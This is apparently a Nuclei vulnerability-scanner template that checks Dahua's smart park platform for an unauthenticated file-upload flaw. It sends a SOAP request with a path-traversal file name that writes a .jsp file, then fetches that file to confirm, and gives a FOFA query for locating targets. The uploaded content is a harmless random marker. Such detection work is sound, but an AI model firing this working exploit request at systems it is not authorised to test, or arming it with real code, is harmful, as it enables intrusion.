id: dahua-bitmap-fileupload

info:
  name: Dahua Bitmap - File Upload Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8E%E6%99%BA%E6%85%A7%E5%9B%AD%E5%8C%BA%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0bitmap%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: "app=\"dahua-智慧园区综合管理平台\""
  tags: dahua,file-upload,rce,intrusive
variables:
  rand_str: "{{randstr}}"
  cmd: "{{base64(to_lower(rand_text_alpha(6)))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /emap/webservice/gis/soap/bitmap HTTP/1.1
        Hostname: {{Hostname}}
        Content-Type: "text/xml; charset=utf-8"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
            <soapenv:Header/>
                <soapenv:Body>
                        <res:uploadPicFile>
                            <arg0>
                            <picPath>/../{{rand_str}}.jsp</picPath>
                            </arg0>
                            <arg1>{{cmd}}</arg1>
                        </res:uploadPicFile>
                </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: word
        internal: true
        words:
          - '<soap:Envelope'

  - raw:
      - |
        GET /upload/{{rand_str}}.jsp HTTP/1.1
        Hostname: {{Hostname}}

    matchers:
      - type: word
        words:
          - '{{base64_decode(cmd)}}'
# digest: 4a0a004730450220574152b68c7d84a00e788ddeecf058793adccbd2c6649a39e1ccb854868cad22022100f8baf96895489c626a2d5427d5ee213b7500a0c59f8a6f17628184819d77646f:922c64590222798bb761d5b6d8e72950